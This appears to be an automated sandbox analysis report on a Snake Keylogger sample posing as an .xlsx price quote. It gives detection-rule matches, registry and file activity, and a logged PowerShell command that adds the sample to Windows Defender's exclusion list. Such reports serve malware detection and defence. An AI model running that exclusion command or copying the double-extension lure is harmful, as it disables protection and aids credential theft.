Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000003.00000002.4107406678.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1716836366.000000000387A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 280, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 6308, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe PID: 6308, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38dd1b0.1.raw.unpack, -.cs	Base64 encoded string: 'G4pV1kZlzrWG3ii/qsKXSnYs+5NUWVZZLTztKeesew9//zKKMVqxJyBhDWLI4hit'
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.38fd5d0.2.raw.unpack, -.cs	Base64 encoded string: 'G4pV1kZlzrWG3ii/qsKXSnYs+5NUWVZZLTztKeesew9//zKKMVqxJyBhDWLI4hit'

Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, Eg32AZ3VE7tJNcho4Z.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, Eg32AZ3VE7tJNcho4Z.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, TucfSNeqMt9wmb7xnA.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, TucfSNeqMt9wmb7xnA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.387b590.3.raw.unpack, TucfSNeqMt9wmb7xnA.cs	Security API names: _0020.AddAccessRule
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, TucfSNeqMt9wmb7xnA.cs	Security API names: _0020.SetAccessControl
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, TucfSNeqMt9wmb7xnA.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, TucfSNeqMt9wmb7xnA.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/6@2/2

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Mutant created: \Sessions\1\BaseNamedObjects\LmrOTkVcqJhIamEAhoqiBxwN

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szrs0nhg.lhe.ps1

Jump to behavior

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002E6E000.00000004.00000800.00020000.00000000.sdmp, ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4109948122.0000000002E5E000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process created: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process created: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: aGZb.pdbSHA256 source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe
Source:	Binary string: aGZb.pdb source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.6ef0000.4.raw.unpack, RZ.cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe.7180000.5.raw.unpack, TucfSNeqMt9wmb7xnA.cs	.Net Code: lGn6g61h4T System.Reflection.Assembly.Load(byte[])
